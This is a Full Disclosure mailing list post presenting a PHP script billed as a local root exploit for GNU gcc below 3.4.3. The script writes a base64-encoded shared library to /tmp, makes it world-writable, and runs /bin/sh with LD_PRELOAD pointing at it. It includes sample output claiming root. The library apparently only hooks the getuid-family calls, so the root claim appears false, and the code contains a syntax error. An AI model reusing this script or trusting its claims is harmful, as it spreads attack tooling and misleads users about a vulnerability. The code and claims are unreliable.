Full Disclosure mailing list archives
GNU gcc vuln. < 3.4.3 local root (.php)
From: "ZzagorR ZzagorR" <zzagorrzzagorr () hotmail com>
Date: Mon, 17 Jan 2005 08:30:48 +0000
#!/usr/bin/php -a <? /* GNU gcc vuln. < 3.4.3 By ZzagorR (MARMARA UNIVERSITY) zzagorrzzagorr () hotmail com http://www.rootbinbash.com thanks to [NST] ah vizeler ahhhhh */ /* sh-2.04$ chmod 777 gcc.php chmod 777 gcc.php sh-2.04$ sh-2.04$ ./gcc.php -------OR>>>>>> sh-2.04$ php gcc.php ./gcc.php Interactive mode enabled X-Powered-By: PHP/4.1.2 Content-type: text/html [+] File Created [+] chmod OK [+] export OK id id uid=0(root) gid=0(root) groups=48(apache) uname -a uname -a Linux *.*****.** 2.4.9-6smp #1 SMP Thu Oct 18 09:22:57 EDT 2001 i686 unknown cat /proc/version cat /proc/versionLinux version 2.4.9-6smp (bhcompile () stripples devel redhat com) (gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-85)) #1 SMP Thu Oct 18 09:22:57 EDT 2001
exit exit uid=48(apache) gid=48(apache) groups=48(apache) sh-2.04$ sh-2.04$ */ $sll="f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAsAUAADQAAACQCgAAAAAAADQAIAADACgAGAAVAAEAAAAA";$sll .="AAAAAAAAAAAAAAB8BwAAfAcAAAUAAAAAEAAAAQAAAHwHAAB8FwAAfBcAAAwBAAAkAQAABgAAAAAQ"; $sll .="AAACAAAAjAcAAIwXAACMFwAAwAAAAMAAAAAGAAAABAAAABEAAAAkAAAAAAAAACAAAAAhAAAAAAAA"; $sll .="ABcAAAAWAAAAAAAAAAAAAAAeAAAAGwAAAAAAAAAdAAAAAAAAACIAAAAVAAAAIwAAAAAAAAAAAAAA"; $sll .="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; $sll .="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAAAABoA"; $sll .="AAAYAAAAAAAAAB8AAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB"; $sll .="AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAH4EAAAAAAAAAwAEAAAAAADIBAAA"; $sll .="AAAAAAMABQAAAAAA+AQAAAAAAAADAAYAAAAAADAFAAAAAAAAAwAHAAAAAABIBQAAAAAAAAMACAAA"; $sll .="AAAAcAUAAAAAAAADAAkAAAAAALAFAAAAAAAAAwAKAAAAAABgBwAAAAAAAAMACwAAAAAAfBcAAAAA"; $sll .="AAADAAwAAAAAAIgXAAAAAAAAAwANAAAAAACMFwAAAAAAAAMADgAAAAAATBgAAAAAAAADAA8AAAAA"; $sll .="AFQYAAAAAAAAAwAQAAAAAABcGAAAAAAAAAMAEQAAAAAAiBgAAAAAAAADABIAAAAAAAAAAAAAAAAA"; $sll .="AwATAAAAAAAAAAAAAAAAAAMAFACHAAAA6AYAAAoAAAASAAoAfwAAANwGAAAJAAAAEgAKAAEAAACM"; $sll .="FwAAAAAAABEA8f+OAAAA9AYAAA4AAAASAAoAYgAAAAAAAAAnAAAAIgAAAHgAAADQBgAACQAAABIA"; $sll .="CgAvAAAASAUAAAAAAAASAAgASgAAAAAAAAAjAAAAIgAAAKcAAACIGAAAAAAAABEA8f81AAAAYAcA"; $sll .="AAAAAAASAAsAOwAAAAAAAAB7AAAAIgAAAKAAAACIGAAAAAAAABEA8f8KAAAAXBgAAAAAAAARAPH/"; $sll .="swAAAKAYAAAAAAAAEQDx/yAAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf"; $sll .="VEFCTEVfAF9fZ21vbl9zdGFydF9fAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdp"; $sll .="c3Rlcl9mcmFtZV9pbmZvAF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBnZXR1aWQAZ2V0ZXVpZABnZXRn"; $sll .="aWQAZ2V0ZWdpZABsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4xLjMA"; $sll .="R0xJQkNfMi4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAB"; $sll .="AAEAAgABAAEAAgABAAEAAwABAAEAAQAAAAAAAQACAJYAAAAQAAAAAAAAAHMfaQkAAAMAuAAAABAA"; $sll .="AAAQaWkNAAACAMQAAAAAAAAAfBcAAAgAAACAFwAACAAAAHgYAAAIAAAAdBgAAAYZAAB8GAAABhwA"; $sll .="AIAYAAAGHwAAhBgAAAYjAABoGAAABxkAAGwYAAAHHAAAcBgAAAcfAABVieWD7BRT6AAAAABbgcMI"; $sll .="EwAA6FAAAADoGwEAAOimAQAAW8nDAAAA/7MEAAAA/6MIAAAAAAAAAP+jDAAAAGgAAAAA6eD/////"; $sll .="oxAAAABoCAAAAOnQ/////6MUAAAAaBAAAADpwP///1WJ5YPsFFPoAAAAAFuBw6ASAACLgygAAACF"; $sll .="wHQC/9BbycOJ9pCQkJCQkJCQkJCQkFWJ5YPsFFPoAAAAAFuBw3ASAACDuyj///8AdWSDuyQAAAAA"; $sll .="dC6DxPSLgxwAAAD/MOiL////g8QQ6xmNtgAAAACLgyT///+NUASJkyT///+LAP/Qi4Mk////gzgA"; $sll .="deKDuyAAAAAAdA+DxPSNgyz///9Q6Dr////Hgyj///8BAAAAi13oycONdgBVieWD7BRT6AAAAABb"; $sll .="gcPoEQAAW8nDifZVieWD7BRT6AAAAABbgcPQEQAAg7sYAAAAAHQWg8T4jYMsAAAAUI2DLP///1Do"; $sll .="zv7//4td6MnDkFWJ5YPsFFPoAAAAAFuBw5gRAABbycOJ9lWJ5THA6wDJw412AFWJ5THA6wDJw412"; $sll .="AFWJ5THA6wGQycOJ9lWJ5THA6wWQjXQmAMnDjbQmAAAAAI28JwAAAABVieWD7BBWU+gAAAAAW4HD"; $sll .="PxEAAI2z8P///4O78P////90DIsG/9CDxvyDPv919FteycOQVYnlg+wUU+gAAAAAW4HDDBEAAFvJ"; $sll .="w422AAAAAFWJ5YPsFFPoAAAAAFuBw/AQAACQ6Gf+//9bycN8FwAAWBgAAAAAAAAAAAAAAQAAAJYA"; $sll .="AAAMAAAASAUAAA0AAABgBwAABAAAAJQAAAAFAAAAsAMAAAYAAABwAQAACgAAAM4AAAALAAAAEAAA"; $sll .="AAMAAABcGAAAAgAAABgAAAAUAAAAEQAAABcAAAAwBQAAEQAAAPgEAAASAAAAOAAAABMAAAAIAAAA"; $sll .="/v//b8gEAAD///9vAQAAAPD//29+BAAA+v//bwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; $sll .="AAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAIwXAAAAAAAAAAAAAIYFAACWBQAApgUAAAAA"; $sll .="AAB8FwAAAAAAAAAAAAAAAAAAAEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJl"; $sll .="cmVsZWFzZSkAAEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkA"; $sll .="AEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkAAEdDQzogKEdO"; $sll .="VSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkAAEdDQzogKEdOVSkgMi45NS40"; $sll .="IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAA"; $sll .="AAEAAAAwMS4wMQAAAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAA"; $sll .="AAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0A"; $sll .="LmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmlu"; $sll .="aXQALnRleHQALmZpbmkALmRhdGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmdv"; $sll .="dAAuYnNzAC5jb21tZW50AC5ub3RlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; $sll .="AAAAAAAAAAAbAAAABQAAAAIAAACUAAAAlAAAANwAAAACAAAAAAAAAAQAAAAEAAAAIQAAAAsAAAAC"; $sll .="AAAAcAEAAHABAABAAgAAAwAAABUAAAAEAAAAEAAAACkAAAADAAAAAgAAALADAACwAwAAzgAAAAAA"; $sll .="AAAAAAAAAQAAAAAAAAAxAAAA////bwIAAAB+BAAAfgQAAEgAAAACAAAAAAAAAAIAAAACAAAAPgAA"; $sll .="AP7//28CAAAAyAQAAMgEAAAwAAAAAwAAAAEAAAAEAAAAAAAAAE0AAAAJAAAAAgAAAPgEAAD4BAAA"; $sll .="OAAAAAIAAAAAAAAABAAAAAgAAABWAAAACQAAAAIAAAAwBQAAMAUAABgAAAACAAAACQAAAAQAAAAI"; $sll .="AAAAXwAAAAEAAAAGAAAASAUAAEgFAAAlAAAAAAAAAAAAAAAEAAAAAAAAAFoAAAABAAAABgAAAHAF"; $sll .="AABwBQAAQAAAAAAAAAAAAAAABAAAAAQAAABlAAAAAQAAAAYAAACwBQAAsAUAALABAAAAAAAAAAAA"; $sll .="ABAAAAAAAAAAawAAAAEAAAAGAAAAYAcAAGAHAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHEAAAABAAAA"; $sll .="AwAAAHwXAAB8BwAADAAAAAAAAAAAAAAABAAAAAAAAAB3AAAAAQAAAAMAAACIFwAAiAcAAAQAAAAA"; $sll .="AAAAAAAAAAQAAAAAAAAAgQAAAAYAAAADAAAAjBcAAIwHAADAAAAAAwAAAAAAAAAEAAAACAAAAIoA"; $sll .="AAABAAAAAwAAAEwYAABMCAAACAAAAAAAAAAAAAAABAAAAAAAAACRAAAAAQAAAAMAAABUGAAAVAgA"; $sll .="AAgAAAAAAAAAAAAAAAQAAAAAAAAAmAAAAAEAAAADAAAAXBgAAFwIAAAsAAAAAAAAAAAAAAAEAAAA"; $sll .="BAAAAJ0AAAAIAAAAAwAAAIgYAACICAAAGAAAAAAAAAAAAAAABAAAAAAAAACiAAAAAQAAAAAAAAAA"; $sll .="AAAAiAgAAPAAAAAAAAAAAAAAAAEAAAAAAAAAqwAAAAcAAAAAAAAAAAAAAHgJAABkAAAAAAAAAAAA"; $sll .="AAABAAAAAAAAABEAAAADAAAAAAAAAAAAAADcCQAAsQAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAA"; $sll .="AAAAAAAAAAAAUA4AACAEAAAXAAAAMwAAAAQAAAAQAAAACQAAAAMAAAAAAAAAAAAAAHASAADbAQAA"; $sll .="AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlAAAAAAAAAADAAEAAAAAAHABAAAA"; $sll .="AAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAfgQAAAAAAAADAAQAAAAAAMgEAAAAAAAAAwAFAAAA"; $sll .="AAD4BAAAAAAAAAMABgAAAAAAMAUAAAAAAAADAAcAAAAAAEgFAAAAAAAAAwAIAAAAAABwBQAAAAAA"; $sll .="AAMACQAAAAAAsAUAAAAAAAADAAoAAAAAAGAHAAAAAAAAAwALAAAAAAB8FwAAAAAAAAMADAAAAAAA"; $sll .="iBcAAAAAAAADAA0AAAAAAIwXAAAAAAAAAwAOAAAAAABMGAAAAAAAAAMADwAAAAAAVBgAAAAAAAAD"; $sll .="ABAAAAAAAFwYAAAAAAAAAwARAAAAAACIGAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA"; $sll .="AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAAAAAAAAAAAAAAAAAwAX"; $sll .="AAEAAACwBQAAAAAAAAAACgAQAAAAsAUAAAAAAAACAAoAIAAAAAAAAAAAAAAABADx/wEAAADgBQAA"; $sll .="AAAAAAAACgArAAAAgBcAAAAAAAABAAwALwAAAFQYAAAAAAAAAQAQAD0AAACEFwAAAAAAAAEADABJ"; $sll .="AAAA4AUAAAAAAAACAAoAXwAAAIgXAAAAAAAAAQANAHIAAABoBgAAAAAAAAIACgB9AAAAiBgAABgA"; $sll .="AAABABIAhwAAAIAGAAAAAAAAAgAKAJMAAAC4BgAAAAAAAAIACgCeAAAAiBcAAAAAAAABAAwArAAA"; $sll .="AEwYAAAAAAAAAQAPACAAAAAAAAAAAAAAAAQA8f8BAAAAEAcAAAAAAAAAAAoAugAAABAHAAAAAAAA"; $sll .="AgAKANAAAABQGAAAAAAAAAEADwCTAAAARAcAAAAAAAACAAoAngAAAIgXAAAAAAAAAQAMAN0AAABY"; $sll .="GAAAAAAAAAEAEADqAAAAiBcAAAAAAAABAA0AAQAAAGAHAAAAAAAAAAAKAPgAAAAAAAAAAAAAAAQA"; $sll .="8f8BAAAA0AYAAAAAAAAAAAoA/gAAAHwXAAAAAAAAAQIMAAsBAADoBgAACgAAABIACgASAQAA3AYA"; $sll .="AAkAAAASAAoAGgEAAIwXAAAAAAAAEQDx/yMBAAD0BgAADgAAABIACgArAQAAAAAAACcAAAAiAAAA"; $sll .="TAEAANAGAAAJAAAAEgAKAFMBAABIBQAAAAAAABIACABZAQAAAAAAACMAAAAiAAAAfAEAAIgYAAAA"; $sll .="AAAAEQDx/4gBAABgBwAAAAAAABIACwCOAQAAAAAAAHsAAAAiAAAAqgEAAIgYAAAAAAAAEQDx/7EB"; $sll .="AABcGAAAAAAAABEA8f/HAQAAoBgAAAAAAAARAPH/zAEAAAAAAAAAAAAAIAAAAABnY2MyX2NvbXBp"; $sll .="bGVkLgBjYWxsX2dtb25fc3RhcnQAY3J0c3R1ZmYuYwBwLjMAX19EVE9SX0xJU1RfXwBjb21wbGV0"; $sll .="ZWQuNABfX2RvX2dsb2JhbF9kdG9yc19hdXgAX19FSF9GUkFNRV9CRUdJTl9fAGZpbmlfZHVtbXkA"; $sll .="b2JqZWN0LjExAGZyYW1lX2R1bW15AGluaXRfZHVtbXkAZm9yY2VfdG9fZGF0YQBfX0NUT1JfTElT"; $sll .="VF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJB"; $sll .="TUVfRU5EX18AbnN0LmMAX19kc29faGFuZGxlAGdldGdpZABnZXRldWlkAF9EWU5BTUlDAGdldGVn"; $sll .="aWQAX19yZWdpc3Rlcl9mcmFtZV9pbmZvQEBHTElCQ18yLjAAZ2V0dWlkAF9pbml0AF9fZGVyZWdp"; $sll .="c3Rlcl9mcmFtZV9pbmZvQEBHTElCQ18yLjAAX19ic3Nfc3RhcnQAX2ZpbmkAX19jeGFfZmluYWxp"; $sll .="emVAQEdMSUJDXzIuMS4zAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABfX2dtb25f";
$sll .="c3RhcnRfXwA=";
echo("By ZzagorR - http://www.rootbinbash.com\n";);
$sll=base64_decode($sll);
$tester1="/tmp/hellogcc";
$testw = fopen($tester1, "w");
ini_set('user_agent',__FILE__);
fwrite($testw,$sll);
fclose($testw);
echo("[+] File Created\n");
$islem1="chmod 777 /tmp/hellogcc";
$islem2="export LD_LIBRARY_PATH=/tmp";
$islem3="LD_PRELOAD=/tmp/hellogcc /bin/sh";
system($islem1);
echo("[+] chmod OK\n");
system($islem2);
echo("[+] export OK [next cmd:id+enter:)]\n");
system($islem3);
system("id");
?>
_________________________________________________________________
Hem e-postalarinizi, hem de Bilgisayarinizi MSN Güvenlik ile koruma altina
alin! http://www.msn.com.tr/security/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- GNU gcc vuln. < 3.4.3 local root (.php) ZzagorR ZzagorR (Jan 17)
- Re: GNU gcc vuln. < 3.4.3 local root (.php) Andrew Farmer (Jan 17)
- Re: GNU gcc vuln. < 3.4.3 local root (.php) Christian (Jan 18)
- <Possible follow-ups>
- Re: GNU gcc vuln. < 3.4.3 local root (.php) ZzagorR ZzagorR (Jan 17)
- Re: GNU gcc vuln. < 3.4.3 local root (.php) Andrew Farmer (Jan 17)